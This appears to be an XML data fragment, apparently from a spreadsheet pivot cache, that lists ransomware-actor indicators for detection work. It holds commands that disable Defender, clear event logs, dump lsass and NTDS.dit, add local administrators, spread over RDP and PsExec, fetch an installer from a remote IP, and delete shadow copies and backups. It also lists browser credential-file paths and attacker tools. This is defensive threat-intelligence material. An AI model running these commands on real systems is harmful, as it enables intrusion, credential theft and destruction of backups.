    <x v="4"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection” /v “DisableBehaviorMonitoring” /t REG _ DWORD /d “1” /f"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="60"/>
    <x v="4"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection” /v “DisableIOAVProtection” /t REG _ DWORD /d “1” /f"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="61"/>
    <x v="4"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection” /v “DisableOnAccessProtection” /t REG _ DWORD /d “1” /f"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="62"/>
    <x v="4"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection” /v “DisableRealtimeMonitoring” /t REG _ DWORD /d “1” /f"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="63"/>
    <x v="4"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection” /v “DisableScanOnRealtimeEnable” /t REG _ DWORD /d “1” /f"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="64"/>
    <x v="4"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\Reporting” /v “DisableEnhancedNotifications” /t REG _ DWORD /d “1” /f"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="65"/>
    <x v="4"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet” /v “DisableBlockAtFirstSeen” /t REG _ DWORD /d “1” /f"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="66"/>
    <x v="4"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet” /v “SpynetReporting” /t REG _ DWORD /d “0” /f"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="67"/>
    <x v="3"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="netsh advfirewall firewall set rule Network Discovery new enable=Yes"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="68"/>
    <x v="2"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="net localgroup administrators xxx /add"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="69"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet” /v “SubmitSamplesConsent” /t REG _ DWORD /d “0” /f"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="70"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="reg add “HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection” /v “DisableRoutinelyTakingAction” /t REG _DWORD /d “1” /f"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="71"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="reg.exe add “HKLM\System\CurrentControlSet\Services\WdBoot” /v “Start” /t REG _DWORD /d “4” /f"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="72"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="reg.exe add “HKLM\System\CurrentControlSet\Services\WdFilter” /v “Start” /t REG _DWORD /d “4” /f"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="73"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="reg.exe add “HKLM\System\CurrentControlSet\Services\WdNisDrv” /v “Start” /t REG _ DWORD /d “4” /f"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="74"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="reg.exe add “HKLM\System\CurrentControlSet\Services\WdNisDrv” /v “Start” /t REG _ DWORD /d “4” /f"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="75"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="reg.exe add “HKLM\System\CurrentControlSet\Services\WdNisSvc” /v “Start” /t REG _ DWORD /d “4” /f"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="76"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="reg.exe add “HKLM\System\CurrentControlSet\Services\WinDefend” /v “Start” /t REG _ DWORD /d “4” /f"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="77"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="reg.exe add “HKLM\System\CurrentControlSet\Services\SecurityHealthService” /v “Start” /t REG _ DWORD /d “4” /f"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="78"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="reg.exe add “HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger” /v “Start” /t REG _ DWORD /d “0” /f"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="79"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="reg.exe delete “HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run” /v “Windows Defender” /f"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="80"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="reg.exe delete “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” /v “Windows Defender” /f"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="81"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="reg.exe delete “HKCR\*\shellex\ContextMenuHandlers\EPP” /f"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="82"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="reg.exe delete “HKCR\Directory\shellex\ContextMenuHandlers\EPP” /f"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="83"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="reg.exe delete “HKCR\Drive\shellex\ContextMenuHandlers\EPP” /f"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="84"/>
    <x v="5"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="Set-MpPreference -DisableRealtimeMonitoring $true;"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="85"/>
    <x v="5"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="Add-MpPreference -ExclusionExtension “.exe”"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="86"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="87"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="cmd.exe /c “$programfiles\Windows Defender\MpCmdRun.exe” -RemoveDefinitions -All"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="88"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="schtasks.exe /Change /TN “Microsoft\Windows\Windows Defender\Windows Defender Cleanup” /Disable"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="89"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="schtasks.exe /Change /TN “Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance” /Disable"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="90"/>
    <x v="0"/>
    <x v="0"/>
    <s v="file_path"/>
    <s v="“$user\$appdata\[random]\cmd.exe”"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="91"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="REG ADD “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce” /V “Virtual Printer Driver” /t REG _ SZ /F /D $user\$appdata\Macromedia\Temporary\WinPrint.exe””"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="92"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="$windir\$system32\cmd.exe /k C:\Windows\inf\usbhub\explorer.exe -f C:\Windows\inf\usbhub\config.log"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="93"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="$windir\$system32\cmd.exe /c ping 1.1.1.1 -n 10 &gt; Nul &amp; Del $selfpath\$selfname.exe /F /Q"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="94"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="“$windir\$system32\cmd.exe” /C ping 127.0.0.7 -n 3 &gt; Nul &amp; fsutil file setZeroData offset=0 length=524288 “$selfpath\$selfname.exe” &amp; Del /f /q “$selfpath\$selfname.exe”"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="95"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="wevtutil cl application"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="96"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="wevtutil cl security"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="97"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="wevtutil cl system"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="98"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="cmd.exe /C for /F \”tokens=*\” %1 in (‘wevutil.exe el’) DO wevutil.exe cl \”%1\”"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="99"/>
    <x v="6"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="procdump.exe -accepteula -ma lsass.exe mem.dmp"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="100"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="$windir\\$system32\\rundll32.exe $windir\\$system32\\comsvcs.dll, MiniDump &lt;lsass _ pid&gt; $windir\\$temp\\xxx full"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="101"/>
    <x v="2"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="net session"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="102"/>
    <x v="2"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="net use"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="103"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="netstat -ano"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="104"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="query session”"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="105"/>
    <x v="2"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="net view"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="106"/>
    <x v="2"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="net view /all"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="107"/>
    <x v="2"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="net view /all /domain"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="108"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="dsquery subnet -limit 0"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="109"/>
    <x v="7"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="nltest /domain _ trusts"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="110"/>
    <x v="7"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="nltest /dclist"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="111"/>
    <x v="2"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="net share"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="112"/>
    <x v="2"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="net view"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="113"/>
    <x v="8"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="whoami /groups"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="114"/>
    <x v="2"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="net group “Enterprise admins” /domain"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="115"/>
    <x v="2"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="net group “Domain admins” /domain"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="116"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="mstsc /v xxx"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="117"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="mstsc /v xxx\c$"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="118"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="“reg add “HKLM\System\CurrentControlSet\Control\Terminal Server” /v “fDenyTSConnections” /t REG_DWORD /d 0 /f"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="119"/>
    <x v="3"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="netsh advfirewall firewall set rule group=”Remote Desktop” new enable=yes"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="120"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="“reg add “HKLM\System\CurrentControlSet\Control\Terminal Server|WinStations\RDP-Tcp” /v “UserAuthentication” /t REG_DWORD /d 0 /f”"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="121"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="Set-ItemProperty -Path ‘HKLM:\System\CurrentControlSet\Control\Terminal Server’-Name “fDenyTSConnections” -Value 0"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="122"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="Enable-NetFirewallRule -DisplayGroup “Remote Desktop”"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="123"/>
    <x v="9"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="“psexec.exe -accepteula -d -s \\&lt;ip _address&gt; &lt;executable _ path&gt;”"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="124"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="“cmd /c copy &lt;executable _ path&gt; \\&lt;ip _address&gt;\ADMIN$ /y”"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="125"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="“Bitsadmin /transfer debjob /download \\[localuser]\C$\Windows\[Conti].dll C:\Windows\[conti].dll”"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="126"/>
    <x v="9"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="“PsExec.exe /accepteula @comps##.txt -u “&lt;domain&gt;\&lt;username&gt;” -p “&lt;password&gt;” cmd /c COPY “\\&lt;xxx&gt;\share$\xxx.exe” “C:\windows\temp\””"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="127"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="“reg add HKEY _ LOCAL _ MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG _ DWORD /f”"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="128"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="“$windir\$system32\msiexec.exe” /q /I hxxp://27.102.70[.]196/km"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="129"/>
    <x v="10"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="“vssadmin delete shadows /all /quiet “"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="130"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="“wbadmin delete catalog -quiet”"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="131"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="“bcdedit /set {default} recoveryenabled no”"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="132"/>
    <x v="10"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="“vssadmin delete shadows /all /quiet”"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="133"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="“Get-ComputerRestorePoint | DeleteComputerRestorePoint;”"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="134"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="“vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB”,"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="135"/>
    <x v="2"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="net stop “Acronis VSS Provider” /y"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="136"/>
    <x v="2"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="net stop “Enterprise Client Service” /y"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="137"/>
    <x v="2"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="net stop “SQLsafe Backup Service” /y"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="138"/>
    <x v="2"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="net stop “SQLsafe Filter Service” /y”"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="139"/>
    <x v="2"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="net stop “Veeam Backup Catalog Data Service” /y"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="140"/>
    <x v="2"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="net stop AcronisAgent /y"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="141"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="sc.exe config SQLTELEMETRY start=disabled"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="142"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="sc.exe config SQLTELEMETRY$ECWDB2 start=disabled"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="143"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="sc.exe config SQLWriter start=disabled"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="144"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="sc.exe config SstpSvc start= disabled"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="145"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="sc.exe config MBAMService start=disabled"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="146"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="sc.exe config wuauserv start= disabled"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="147"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="iisreset.exe /stop"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="148"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="taskkill /f /im vee*"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="149"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="taskkill /f /im postg*"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="150"/>
    <x v="0"/>
    <x v="0"/>
    <s v="generic"/>
    <s v="Image _ path: $selfpath\$selfname.exe_x000a_Registry _ key: \REGISTRY\USER\$usersid\Software\Microsoft\Windows\CurrentVersion\Run_x000a_Target _ file: $selfpath\\$selfname.exe"/>
    <s v="registry run key add"/>
    <x v="0"/>
  </r>
  <r>
    <x v="151"/>
    <x v="0"/>
    <x v="0"/>
    <s v="generic"/>
    <s v="Image _ path: $selfpath\$selfname.exe_x000a_Registry _ key: \REGISTRY\USER\$usersid\Software\Microsoft\Windows\CurrentVersion\Run_x000a_Target _ file: $user\$temp\Payload.exe "/>
    <s v="registry run key add"/>
    <x v="0"/>
  </r>
  <r>
    <x v="152"/>
    <x v="0"/>
    <x v="0"/>
    <s v="generic"/>
    <s v="Image _ path: $user\$temp\Payload.exe_x000a_Registry _ key: \REGISTRY\USER\$usersid\Software\Microsoft\Windows\CurrentVersion\Run_x000a_Target _ file: C:\Users\[user]\AppData\Roaming\Microsoft\Windows\Templates\Windows.URL"/>
    <s v="registry run key add"/>
    <x v="0"/>
  </r>
  <r>
    <x v="153"/>
    <x v="0"/>
    <x v="0"/>
    <s v="file_path"/>
    <s v="C:\Users\[user]\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="154"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v=" $windir\$system32\DllHost.exe / Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} "/>
    <s v="{3E5FC7F9-9A51-4367-9063-A120244FBEC7} - CLSID of CMSTPLUA_x000a_COM Object"/>
    <x v="0"/>
  </r>
  <r>
    <x v="155"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="$windir\$system32\DllHost.exe / Processid:{D2E7041B-2927–42fb-8E9F-7CE93B6DC937}"/>
    <s v="{D2E7041B-2927–42fb-8E9F-7CE93B6DC937} - CLSID of_x000a_ColorDataProxy COM Object"/>
    <x v="0"/>
  </r>
  <r>
    <x v="156"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="Invoke-TokenManipulation"/>
    <s v="PowerSploit"/>
    <x v="0"/>
  </r>
  <r>
    <x v="157"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="Get-System"/>
    <s v="Empire"/>
    <x v="0"/>
  </r>
  <r>
    <x v="158"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="$windir\regedit.exe -single 1df11bc19aa52b623bdf15380e3fded56d8eb6fb7b53a2240779864b1a6474ad"/>
    <s v="Process Hollowing BlackByte"/>
    <x v="0"/>
  </r>
  <r>
    <x v="159"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v=" cmd /c “”$user\$temp\update.bat” “"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="160"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="REG ADD “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce” /V “Virtual PrinterDriver” /t REG _ SZ /F /D “”$user\$appdata\Macromedia\Temporary\WinPrint.exe””"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="161"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="$windir\$system32\cmd.exe /k C:\Windows\inf\usbhub\explorer.exe -f C:\Windows\inf\usbhub\config.log"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="162"/>
    <x v="0"/>
    <x v="0"/>
    <s v="file_path"/>
    <s v="$user\$appdata\Microsoft\Windows\Start Menu\Programs\Startup\Java update.exe"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="163"/>
    <x v="0"/>
    <x v="0"/>
    <s v="generic"/>
    <s v="The Cobalt_x000a_Strike sample accessed lsass.exe with the rights 0x1010 (read rights)_x000a_and dumped credentials of users logged on to the system."/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="164"/>
    <x v="0"/>
    <x v="0"/>
    <s v="generic"/>
    <s v="Image _ path: “$selfpath\$selfname”_x000a_Registry _ key: “\REGISTRY\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest”_x000a_Registry _ value _ name: “UserLogonCredential”_x000a_Registry _ value: “0x00000001”"/>
    <s v="A secondary indicator of possible dumping the lsass.exe memory to_x000a_gain credentials is setting the Registry Key that forces the system_x000a_to store passwords in memory in plaintext,"/>
    <x v="0"/>
  </r>
  <r>
    <x v="165"/>
    <x v="11"/>
    <x v="0"/>
    <s v="generic"/>
    <s v="use ntdsutil to dump the NTDS.dit database"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="166"/>
    <x v="11"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="“ntdsutil “ac in ntds” “ifm” “cr fu C:\Perflogs\1” q q “"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="167"/>
    <x v="0"/>
    <x v="0"/>
    <s v="generic"/>
    <s v="Image _ path: “$selfpath\$selfname.exe”,_x000a_File _ path: “$user\$appdata\Mozilla\Firefox\Profiles\054111xg.default\key3.db”,_x000a_File _ path: “$user\$appdata\Google\Chrome\User Data\_x000a_Default\Login Data”"/>
    <s v="Browser Passwords"/>
    <x v="0"/>
  </r>
  <r>
    <x v="168"/>
    <x v="0"/>
    <x v="0"/>
    <s v="generic"/>
    <s v="Image _ path: “$selfpath\$selfname.exe”,_x000a_File _ path: “$appdata\Local\Google\Chrome\User Data\Local State”,_x000a_File _ path: “$appdata\Local\Google\Chrome\User Data\WebData-journal”,_x000a_File _ path: “$appdata\Local\Google\Chrome\User Data\WebData”,"/>
    <s v="Browser Passwords"/>
    <x v="0"/>
  </r>
  <r>
    <x v="169"/>
    <x v="0"/>
    <x v="0"/>
    <s v="htool"/>
    <s v="Bloodhound"/>
    <s v="ransomware actors use the BloodHound utility to gather_x000a_information about the victim’s infrastructure. BloodHound provides_x000a_the attacker with a visualisation of relationships in Active Directory_x000a_and analysis of the AD rights. "/>
    <x v="0"/>
  </r>
  <r>
    <x v="170"/>
    <x v="0"/>
    <x v="0"/>
    <s v="c2"/>
    <s v="Cobalt Strike"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="171"/>
    <x v="12"/>
    <x v="0"/>
    <s v="htool"/>
    <s v="Mimikatz"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="172"/>
    <x v="0"/>
    <x v="0"/>
    <s v="c2"/>
    <s v="PowerShell Empire"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="173"/>
    <x v="0"/>
    <x v="0"/>
    <s v="htool"/>
    <s v=" LaZagne"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="174"/>
    <x v="9"/>
    <x v="0"/>
    <s v="htool"/>
    <s v="PsExec"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="175"/>
    <x v="6"/>
    <x v="0"/>
    <s v="htool"/>
    <s v="procdump"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="176"/>
    <x v="0"/>
    <x v="0"/>
    <s v="htool"/>
    <s v="Ammy Admin"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="177"/>
    <x v="0"/>
    <x v="0"/>
    <s v="htool"/>
    <s v="Advanced IP Scanner"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="178"/>
    <x v="0"/>
    <x v="0"/>
    <s v="htool"/>
    <s v="RedLine Stealer"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="179"/>
    <x v="0"/>
    <x v="0"/>
    <s v="htool"/>
    <s v="NBMiner"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="180"/>
    <x v="0"/>
    <x v="0"/>
    <s v="htool"/>
    <s v="PCHunter"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="181"/>
    <x v="0"/>
    <x v="0"/>
    <s v="htool"/>
    <s v="GMER"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="182"/>
    <x v="0"/>
    <x v="0"/>
    <s v="htool"/>
    <s v="AnyDesk"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="183"/>
    <x v="0"/>
    <x v="0"/>
    <s v="htool"/>
    <s v="SoftPerfect Network Scanner"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="184"/>
    <x v="0"/>
    <x v="0"/>
    <s v="htool"/>
    <s v="Process Explorer"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="185"/>
    <x v="13"/>
    <x v="0"/>
    <s v="htool"/>
    <s v="PowerView"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="186"/>
    <x v="0"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="Windows Shell Start by Web Applications"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="187"/>
    <x v="0"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="Started windows shell from Trusted process"/>
    <m/>
    <x v="0"/>
  </r>
